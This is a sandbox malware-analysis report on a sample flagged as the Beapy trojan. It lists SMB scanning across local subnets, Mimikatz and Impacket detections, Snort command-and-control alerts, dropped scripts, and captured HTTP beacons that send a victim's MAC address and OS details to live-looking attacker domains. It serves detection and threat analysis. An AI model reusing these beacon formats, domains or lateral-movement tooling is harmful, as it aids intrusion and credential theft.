Source: global trafficTCP traffic: 192.168.1.138:445
Source: global trafficTCP traffic: 192.168.1.139:445
Source: global trafficTCP traffic: 192.168.1.132:445
Source: global trafficTCP traffic: 192.168.1.253:445
Source: global trafficTCP traffic: 192.168.1.133:445
Source: global trafficTCP traffic: 192.168.1.254:445
Source: global trafficTCP traffic: 192.168.1.134:445
Source: global trafficTCP traffic: 192.168.1.135:445
Source: global trafficTCP traffic: 192.168.1.250:445
Source: global trafficTCP traffic: 192.168.1.130:445
Source: global trafficTCP traffic: 192.168.1.251:445
Source: global trafficTCP traffic: 192.168.1.131:445
Source: global trafficTCP traffic: 192.168.1.252:445
Source: global trafficTCP traffic: 192.168.0.219:445
Source: global trafficTCP traffic: 192.168.0.218:445
Source: global trafficTCP traffic: 192.168.0.215:445
Source: global trafficTCP traffic: 192.168.0.214:445
Source: global trafficTCP traffic: 192.168.0.217:445
Source: global trafficTCP traffic: 192.168.0.216:445
Source: global trafficTCP traffic: 192.168.0.211:445
Source: global trafficTCP traffic: 192.168.0.210:445
Source: global trafficTCP traffic: 192.168.0.213:445
Source: global trafficTCP traffic: 192.168.0.212:445
Source: global trafficTCP traffic: 192.168.1.129:445
Source: global trafficTCP traffic: 192.168.1.125:445
Source: global trafficTCP traffic: 192.168.1.246:445
Source: global trafficTCP traffic: 192.168.1.126:445
Source: global trafficTCP traffic: 192.168.1.247:445
Source: global trafficTCP traffic: 192.168.1.127:445
Source: global trafficTCP traffic: 192.168.1.248:445
Source: global trafficTCP traffic: 192.168.1.128:445
Source: global trafficTCP traffic: 192.168.1.249:445
Source: global trafficTCP traffic: 192.168.1.121:445
Source: global trafficTCP traffic: 192.168.1.242:445
Source: global trafficTCP traffic: 192.168.1.122:445
Source: global trafficTCP traffic: 192.168.1.243:445
Source: global trafficTCP traffic: 192.168.1.123:445
Source: global trafficTCP traffic: 192.168.1.244:445
Source: global trafficTCP traffic: 192.168.1.124:445
Source: global trafficTCP traffic: 192.168.1.245:445
Source: global trafficTCP traffic: 192.168.1.240:445
Source: global trafficTCP traffic: 192.168.1.120:445
Source: global trafficTCP traffic: 192.168.1.241:445
Source: global trafficTCP traffic: 192.168.0.208:445
Source: global trafficTCP traffic: 192.168.0.207:445
Source: global trafficTCP traffic: 192.168.0.209:445
Source: global trafficTCP traffic: 192.168.0.204:445
Source: global trafficTCP traffic: 192.168.0.203:445
Source: global trafficTCP traffic: 192.168.0.206:445
Source: global trafficTCP traffic: 192.168.0.205:445
Source: global trafficTCP traffic: 192.168.0.200:445
Source: global trafficTCP traffic: 192.168.0.202:445
Source: global trafficTCP traffic: 192.168.0.201:445
Source: global trafficTCP traffic: 192.168.1.158:445
Source: global trafficTCP traffic: 192.168.1.159:445
Source: global trafficTCP traffic: 192.168.1.154:445
Source: global trafficTCP traffic: 192.168.1.155:445
Source: global trafficTCP traffic: 192.168.1.156:445
Source: global trafficTCP traffic: 192.168.1.157:445
Source: global trafficTCP traffic: 192.168.1.150:445
Source: global trafficTCP traffic: 192.168.1.151:445
Source: global trafficTCP traffic: 192.168.1.152:445
Source: global trafficTCP traffic: 192.168.1.153:445
Source: global trafficTCP traffic: 192.168.0.119:445
Source: global trafficTCP traffic: 192.168.0.116:445
Source: global trafficTCP traffic: 192.168.0.237:445
Source: global trafficTCP traffic: 192.168.0.236:445
Source: global trafficTCP traffic: 192.168.0.115:445
Source: global trafficTCP traffic: 192.168.0.118:445
Source: global trafficTCP traffic: 192.168.0.239:445
Source: global trafficTCP traffic: 192.168.0.117:445
Source: global trafficTCP traffic: 192.168.0.238:445
Source: global trafficTCP traffic: 192.168.0.112:445
Source: global trafficTCP traffic: 192.168.0.233:445
Source: global trafficTCP traffic: 192.168.0.111:445
Source: global trafficTCP traffic: 192.168.0.232:445
Source: global trafficTCP traffic: 192.168.0.235:445
Source: global trafficTCP traffic: 192.168.0.114:445
Source: global trafficTCP traffic: 192.168.0.113:445
Source: global trafficTCP traffic: 192.168.0.234:445
Source: global trafficTCP traffic: 192.168.0.231:445
Source: global trafficTCP traffic: 192.168.0.110:445
Source: global trafficTCP traffic: 192.168.0.230:445
Source: global trafficTCP traffic: 192.168.1.147:445
Source: global trafficTCP traffic: 192.168.1.148:445
Source: global trafficTCP traffic: 192.168.1.149:445
Source: global trafficTCP traffic: 192.168.1.143:445
Source: global trafficTCP traffic: 192.168.1.144:445
Source: global trafficTCP traffic: 192.168.1.145:445
Source: global trafficTCP traffic: 192.168.1.146:445
Source: global trafficTCP traffic: 192.168.1.140:445
Source: global trafficTCP traffic: 192.168.1.141:445
Source: global trafficTCP traffic: 192.168.1.142:445
Source: global trafficTCP traffic: 192.168.0.109:445
Source: global trafficTCP traffic: 192.168.0.229:445
Source: global trafficTCP traffic: 192.168.0.108:445
Source: global trafficTCP traffic: 192.168.0.226:445
Source: global trafficTCP traffic: 192.168.0.105:445
Source: global trafficTCP traffic: 192.168.0.225:445
Source: global trafficTCP traffic: 192.168.0.104:445
Source: global trafficTCP traffic: 192.168.0.107:445
Source: global trafficTCP traffic: 192.168.0.228:445
Source: global trafficTCP traffic: 192.168.0.106:445
Source: global trafficTCP traffic: 192.168.0.227:445
Source: global trafficTCP traffic: 192.168.0.101:445

Privilege Escalation:

barindex
Detected Hacktool Mimikatz
Source: PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.drString found in binary or memory: ## \ / ## > http://blog.gentilkiwi.com/mimikatz
Source: UlJpFEz1Cj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: unknownHTTPS traffic detected: 45.79.77.20:443 -> 192.168.2.3:49747 version: TLS 1.0
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dll
Source: UlJpFEz1Cj.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\unicodedata.pdb source: unicodedata.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_ssl.pdb source: _ssl.pyd.0.dr
Source: Binary string: msvcr90.i386.pdb source: msvcr90.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32api.pdb source: win32api.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_ctypes.pdb source: _ctypes.pyd.0.dr
Source: Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb source: pywintypes27.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_socket.pdb source: _socket.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32wnet.pdbpd source: win32wnet.pyd.0.dr
Source: Binary string: C:\build27\cpython\PCBuild\python27.pdb source: python27.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32wnet.pdb source: win32wnet.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\select.pdb source: select.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\pyexpat.pdb source: pyexpat.pyd.0.dr
Source: Binary string: msvcp90.i386.pdb source: msvcp90.dll.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32pipe.pdb source: win32pipe.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_multiprocessing.pdbU7 source: _multiprocessing.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_hashlib.pdb source: _hashlib.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32api.pdbL source: win32api.pyd.0.dr
Source: Binary string: c:\Users\glyph\pywin32-219\build\temp.win32-2.7\Release\win32event.pdb source: win32event.pyd.0.dr
Source: Binary string: O:\src\pywin32\build\temp.win32-2.7\Release\pywintypes.pdb$ source: pywintypes27.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_socket.pdbE source: _socket.pyd.0.dr
Source: Binary string: msvcm90.i386.pdb source: msvcm90.dll.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\bz2.pdb5 source: bz2.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\_multiprocessing.pdb source: _multiprocessing.pyd.0.dr
Source: Binary string: C:\loewis\27\python\PCbuild\Win32-pgo\bz2.pdb source: bz2.pyd.0.dr
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI65282\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI65~1\

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: TrafficSnort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:50713 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:50713 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:58987 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:49743 -> 72.52.178.23:80
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:49746 -> 173.231.189.15:80
Source: TrafficSnort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:64938 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:64938 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:64910 -> 8.8.8.8:53
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.3:
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:49881 -> 72.52.178.23:80
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50005 -> 173.231.189.15:80
Source: TrafficSnort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:56130 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:56130 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:56338 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50366 -> 72.52.178.23:80
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50490 -> 173.231.189.15:80
Source: TrafficSnort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:58784 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:58784 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:63978 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50919 -> 72.52.178.23:80
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:50993 -> 173.231.189.15:80
Source: TrafficSnort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:55708 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:55708 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:56803 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:51350 -> 72.52.178.23:80
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:51384 -> 173.231.189.15:80
Source: TrafficSnort IDS: 2029058 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:55359 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029057 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:55359 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2029056 ET TROJAN Win32/Beapy CnC Domain in DNS Lookup 192.168.2.3:58306 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:51772 -> 72.52.178.23:80
Source: TrafficSnort IDS: 2027149 ET TROJAN Py/Beapy CnC Checkin 192.168.2.3:51981 -> 173.231.189.15:80
Uses netstat to query active network connections and open ports
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -na
Source: Joe Sandbox ViewIP Address: 79.98.145.42 79.98.145.42
Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
Source: Joe Sandbox ViewIP Address: 72.52.178.23 72.52.178.23
Source: Joe Sandbox ViewASN Name: VOXEL-DOT-NETUS VOXEL-DOT-NETUS
Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
Source: unknownHTTPS traffic detected: 45.79.77.20:443 -> 192.168.2.3:49747 version: TLS 1.0
Source: global trafficHTTP traffic detected: GET /raw HTTP/1.1Accept-Encoding: identityHost: ip.42.plConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.beahh.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept-Encoding: identityHost: jsonip.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.abbny.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.beahh.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.abbny.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.beahh.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.abbny.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.beahh.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.abbny.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.beahh.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.abbny.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.beahh.comConnection: closeUser-Agent: Python-urllib/2.7
Source: global trafficHTTP traffic detected: GET /e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 HTTP/1.1Accept-Encoding: identityHost: info.abbny.comConnection: closeUser-Agent: Python-urllib/2.7
Source: unknownDNS traffic detected: queries for: info.ackng.com
Source: PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.drString found in binary or memory: http://blog.gentilkiwi.com/mimikatz
Source: UlJpFEz1Cj.exe, 00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmpString found in binary or memory: http://i.haqo.net/s.png?u=
Source: UlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmpString found in binary or memory: http://ip.42.pl/raw
Source: UlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmpString found in binary or memory: http://jsonip.com
Source: PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.drString found in binary or memory: http://mysmartlogon.com
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.drString found in binary or memory: http://pingcastle.com
Source: python27.dll.0.drString found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: pywintypes27.dll.0.drString found in binary or memory: http://pywin32.sourceforge.net0
Source: UlJpFEz1Cj.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: UlJpFEz1Cj.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
Source: UlJpFEz1Cj.exeString found in binary or memory: http://sf.symcd.com0&
Source: UlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmpString found in binary or memory: http://w.beahh.com/page.html?p%COMPUTERNAME%
Source: powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: _ssl.pyd.0.drString found in binary or memory: http://www.openssl.org/support/faq.html
Source: _hashlib.pyd.0.drString found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: unicodedata.pyd.0.drString found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: UlJpFEz1Cj.exeString found in binary or memory: https://d.symcb.com/cps0%
Source: UlJpFEz1Cj.exeString found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: UlJpFEz1Cj.exe, type: SAMPLEMatched rule: Compiled Impacket Tools Author: Florian Roth
Source: UlJpFEz1Cj.exe, type: SAMPLEMatched rule: Detects Impacket Network Aktivity for Lateral Movement Author: Markus Neis
Source: C:\Users\user\Desktop\m2.ps1, type: DROPPEDMatched rule: Detects code from APT wateringhole Author: @dragonthreatlab
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
Source: UlJpFEz1Cj.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UlJpFEz1Cj.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UlJpFEz1Cj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: UlJpFEz1Cj.exe, type: SAMPLEMatched rule: Impacket_Keyword date = 2017-08-04, hash2 = 2f6d95e0e15174cfe8e30aaa2c53c74fdd13f9231406b7103da1e099c08be409, author = Florian Roth, description = Detects Impacket Keyword in Executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 9388c78ea6a78dbea307470c94848ae2481481f593d878da7763e649eaab4068
Source: UlJpFEz1Cj.exe, type: SAMPLEMatched rule: Impacket_Tools_psexec date = 2017-04-07, hash1 = 27bb10569a872367ba1cfca3cf1c9b428422c82af7ab4c2728f501406461c364, author = Florian Roth, description = Compiled Impacket Tools, reference = https://github.com/maaaaz/impacket-examples-windows, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: UlJpFEz1Cj.exe, type: SAMPLEMatched rule: Impacket_Lateral_Movement date = 2018-03-22, author = Markus Neis, description = Detects Impacket Network Aktivity for Lateral Movement, reference = https://github.com/CoreSecurity/impacket, score =
Source: 00000003.00000003.203224359.0000000004464000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: 00000003.00000003.203074202.000000000435C000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: 00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: Process Memory Space: UlJpFEz1Cj.exe PID: 6640, type: MEMORYMatched rule: SUSP_Netsh_PortProxy_Command date = 2019-04-20, author = Florian Roth, description = Detects a suspicious command line with netsh and the portproxy command, reference = https://docs.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-interface-portproxy, score = 9b33a03e336d0d02750a75efa1b9b6b2ab78b00174582a9b2cb09cd828baea09
Source: Process Memory Space: powershell.exe PID: 6964, type: MEMORYMatched rule: power_pe_injection author = Benjamin DELPY (gentilkiwi), description = PowerShell with PE Reflective Injection
Source: C:\Users\user\Documents\20210405\PowerShell_transcript.830021.w56wNSku.20210405112311.txt, type: DROPPEDMatched rule: Mimikatz_Logfile author = Florian Roth, description = Detects a log file generated by malicious hack tool mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2015/03/31
Source: C:\Users\user\Desktop\mkatz.ini, type: DROPPEDMatched rule: Mimikatz_Logfile author = Florian Roth, description = Detects a log file generated by malicious hack tool mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2015/03/31
Source: C:\Users\user\Desktop\m2.ps1, type: DROPPEDMatched rule: apt_c16_win_wateringhole date = 2015/01/11, author = @dragonthreatlab, description = Detects code from APT wateringhole, reference = http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html
Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@30/39@21/100
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\Desktop\m2.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_01
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65282Jump to behavior
Source: UlJpFEz1Cj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration 